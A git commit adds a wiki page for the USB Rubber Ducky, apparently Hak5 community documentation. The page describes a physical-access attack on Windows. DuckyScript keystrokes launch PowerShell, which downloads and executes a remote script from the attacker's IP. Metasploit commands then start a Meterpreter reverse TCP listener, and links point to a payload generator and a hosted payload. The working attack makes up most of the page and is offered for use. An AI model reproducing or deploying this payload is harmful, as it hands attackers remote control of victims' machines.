Sorry about any spelling mistakes (My first wiki page)

This commit is contained in:
Ujjwal Thakran 2017-04-03 22:08:51 +10:00
parent 80301c5e26
commit 468cf468a0
1 changed files with 63 additions and 0 deletions

View File

@ -0,0 +1,63 @@
* Author - Ujjwal Thakran
* When You insert the ducky it will run a Powershell download command from which you can use you Kali linux or If you have Metasploit properly installed than also you mac or other Linux Distros to create a meterpeter session with the target computer
* Alternative to [Payload Reverse Shell](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---reverse-shell)
1. Encode your usb rubber Ducky with the Following
```
REM Replace the Site/IP address with you Kali linux IP Address
DELAY 800
GUI r
DELAY 800
STRING cmd
DELAY 300
ENTER
DELAY 300
STRING powershell IEX (New-Object Net.WebClient).DownloadString('(Site/IP address)/powershell.ps1')
DELAY 300
ENTER
```
#### I suggest using [Ducky Encoder](https://ducktoolkit.com/encoder/) for this Payload
2. Create a PowerShell Meterpreter reverse TCP payload and Place it on your Host Computer
#### Use This to create the Payload [Powershell Payload generator](https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky))
Here is the Powershell Payload I generated for My IP
#### [Payload Link](https://pastebin.com/c7xrRCY9)
3. Fire up MSFCONSOLE and start the listener:
```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (Your IP)
set LPORT (Your PORT #)
run
```
4. Insert the USB rubber ducky in and wait for the magic to happen
##### And Thats It folks You can run custom
```
Shell
```
#### After that
* ###### Contact Me on Github or Email me at (ujjwalthakran@hotmail.com) For Edit or help Thanks